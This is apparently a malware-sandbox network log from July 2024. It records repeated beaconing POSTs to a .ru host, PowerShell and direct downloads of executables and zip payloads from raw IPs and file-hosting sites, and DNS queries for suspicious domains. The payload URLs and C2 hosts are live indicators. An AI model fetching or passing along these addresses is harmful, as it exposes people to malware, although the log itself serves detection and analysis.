Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrfvitgbvcw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bnvcslusckae.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qinwutyayfcko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fpsqjgbmrba.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fnhraoopptocahym.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uffvfrhcnqd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbsrmkgaclwdahn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkiilqyskldjgofe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://brdcuglswdjuibu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqxhoujpotsnhua.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://igndfrdsspnvoxyl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://snlibtbsitsby.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://srmyuatrmfavkh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yepbkxlonjp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rqsjxbmjbmnltw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oydnksqvapytmm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: mzxn.ru
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62336 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: global traffic HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212
Source: global traffic DNS traffic detected: DNS query: mzxn.ru
Source: global traffic DNS traffic detected: DNS query: mussangroup.com
Source: global traffic DNS traffic detected: DNS query: funrecipebooks.com
Source: global traffic DNS traffic detected: DNS query: rentry.co
Source: global traffic DNS traffic detected: DNS query: callosallsaospz.shop
Source: global traffic DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic DNS traffic detected: DNS query: liernessfornicsa.shop
Source: unknown HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9147
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
